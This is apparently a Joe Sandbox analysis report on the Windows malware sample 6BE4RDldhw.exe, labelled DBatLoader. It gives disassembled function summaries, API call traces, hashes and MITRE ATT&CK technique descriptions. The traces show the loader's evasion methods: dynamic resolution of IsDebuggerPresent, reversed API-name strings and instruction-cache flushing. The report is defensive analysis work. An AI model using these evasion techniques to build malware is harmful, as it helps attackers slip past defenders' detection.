Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 51830dee199f3ac085d7d39db66e077fd87af932c8fdc2c0496592eca8be7e58
Instruction ID: 186664e12d947455119b49f17dac0ff9c93d93484f215164a446187476dae07d
Opcode Fuzzy Hash: 51830dee199f3ac085d7d39db66e077fd87af932c8fdc2c0496592eca8be7e58
Instruction Fuzzy Hash: 3541CF717C45055BD712EB7888946FFB2FBDB85208B64F536F452C7388EA349902CA61

Function 02E881D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212

Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1

GetModuleHandleA.KERNELBASE(?), ref: 02E88226

Strings

AeldnaHeludoMteG, xrefs: 02E881ED
KernelBASE, xrefs: 02E8820D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: d0199fd8bc1f380afcf01499f85ae669fef7a22515d30cf82ae386312cad3f09
Instruction ID: a97e9c02aefcaa3a87129ca6e06c60d5aea255060db42c0b0d3a73b0566a7629
Opcode Fuzzy Hash: d0199fd8bc1f380afcf01499f85ae669fef7a22515d30cf82ae386312cad3f09
Instruction Fuzzy Hash: 27F06D306C4708BFEB40FBB5DD0191AB7EDE789700BD2E860F94CC2650E630AD108A25

Function 02E8F6E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02E8FAE7,UacInitialize,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize), ref: 02E8F6EA
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E8F6FC

Strings

IsDebuggerPresent, xrefs: 02E8F6F6
KernelBase, xrefs: 02E8F6E5

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: d35ba05eed2e82d3863f139368a1089753c8e84c38e2e280520738aca375797e
Instruction ID: e42199b99fac4878d00dc37f5af49b2bc284b75965c3f4daa53b6c4e0259d722
Opcode Fuzzy Hash: d35ba05eed2e82d3863f139368a1089753c8e84c38e2e280520738aca375797e
Instruction Fuzzy Hash: A2D012913E07401DF90077F41CC4819024D895553D3A0BE30B06FD6492E5A788555410

Function 02E7C47C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02E9D10B,00000000,02E9D11E), ref: 02E7C482
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E7C493

Strings

kernel32.dll, xrefs: 02E7C47D
GetDiskFreeSpaceExA, xrefs: 02E7C48D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 4df78a3a3fa593a2ad0bcc10bc2f943f79bf77cfd6a88b06c0ad7d6405864926
Instruction ID: e189e200c2534b9fe1f063c80e3cbc888bd069ea549729b7b1123efc6eb2f8c1
Opcode Fuzzy Hash: 4df78a3a3fa593a2ad0bcc10bc2f943f79bf77cfd6a88b06c0ad7d6405864926
Instruction Fuzzy Hash: 84D05EA0AC03015EE6209FF25888A32329C830834CF58F837E20185201E77558508F85

Function 02E7E1F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E7E29F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E7E2BB
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E7E332
VariantClear.OLEAUT32(?), ref: 02E7E35B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: f2c5f1f143f7c82922a15d1d93299d527c1e4bda3980e795f7c8a2e801c8de72
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 1B412975A402299FCB62DB58CC90BD9B3BDAF59304F0891D9E64DE7211DB30AF858F60

Function 02E7AD44 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: d898fd6f81c99f57ac89e2fdf397dbfb623938ad67e5cf92b3a49a54b4edbb4f
Instruction ID: 74e9a68271b658ceb32d021be4eacb4ed89df97b36bf684a10fa7d91a311b68a
Opcode Fuzzy Hash: d898fd6f81c99f57ac89e2fdf397dbfb623938ad67e5cf92b3a49a54b4edbb4f
Instruction Fuzzy Hash: B5414B70A802589BDB61DB68CC84BDEB7FDAB18304F4090E5A648E7341DB74AF88CF51

Function 02E7AD42 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 95940d0247da054abbb648bd46a54e81e4c977f131765ca6931700c0b40744c6
Instruction ID: 029f59b1193c8d880ebc5ca39a75f67fab654ae23596dc44ab44b2fec4af1ce8
Opcode Fuzzy Hash: 95940d0247da054abbb648bd46a54e81e4c977f131765ca6931700c0b40744c6
Instruction Fuzzy Hash: A4414C70A802589BDB61DB68CC84BDEB7FDAB18304F4090E5A648E7341DB74AF88CF51

Function 02E71C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6837786b63149f5d45002c7ef2e27a75f70456dfc90f32f955a053c6da68189
Instruction ID: dfdf3842260e3118e6f149b19ed6e66fabf91529a542f3a71f5ae32b6d3755c9
Opcode Fuzzy Hash: b6837786b63149f5d45002c7ef2e27a75f70456dfc90f32f955a053c6da68189
Instruction Fuzzy Hash: ABA1C3B67907000BD718AA7D9C843AEB396DBC5329F18E27EE21DCF381EB6489418751

Function 02E794F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E795E2), ref: 02E7957A
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E795E2), ref: 02E79580

Strings

yyyy, xrefs: 02E79555

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 5ce60783d77237109e4550609e0c3e7730112109665070f4c1869e6e3b4fc9f6
Instruction ID: 907cb1486d554fd26e097aeddf739e5f65389a6699ddabe7c45960cc27edc2b0
Opcode Fuzzy Hash: 5ce60783d77237109e4550609e0c3e7730112109665070f4c1869e6e3b4fc9f6
Instruction Fuzzy Hash: 0D215371A401289FDB11DFA8C881AEEB3B9EF09700F51A4A5F905E7291E730DE40DFA5

Function 02E88340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02E881D4: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212
Part of subcall function 02E881D4: GetModuleHandleA.KERNELBASE(?), ref: 02E88226

Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E883CA), ref: 02E883AC

Strings

FlushInstructionCache, xrefs: 02E88359
Kernel32, xrefs: 02E8838B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 8c996c04d76bb3a92f1ad00a4dc25e87101eb849e912bb6a118e27148fe88672
Instruction ID: 8779d2c8503d70a7103d0e189dc7c1087653fc12e9efad0b0e68c59081d414d7
Opcode Fuzzy Hash: 8c996c04d76bb3a92f1ad00a4dc25e87101eb849e912bb6a118e27148fe88672
Instruction Fuzzy Hash: 380146716C0208FFE741FEA5DC52B5AB7AEEB48B00F91E421BA08D6680D674A9508B25

Function 02E8AF20 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AF54
IsBadWritePtr.KERNEL32(?,00000004), ref: 02E8AF84
IsBadReadPtr.KERNEL32(?,00000008), ref: 02E8AFA3
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AFAF

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
Instruction ID: 9a1bc45291727bce65a1aabd8bb5810067028e9a12db1d5aa60e6edd3aff1eb8
Opcode Fuzzy Hash: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
Instruction Fuzzy Hash: F721DAB26806199FDB20EF66CC80B9E736AEF40358F04D522FD5C97380D734E8158B90

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6BE4RDldhw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
6BE4RDldhw.exe

Function 02E8F7C4 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071
COMMON

Function 02E75ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 02E8F740 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Function 02E8DD6C Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 02E8E4B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Function 02E87D80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Function 02E86DD0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Function 02E71724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 02E888C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Function 02E71A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 02E8E4B2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Function 02E7E36C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 02E870E4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Function 02E7E768 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Function 02E7E404 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON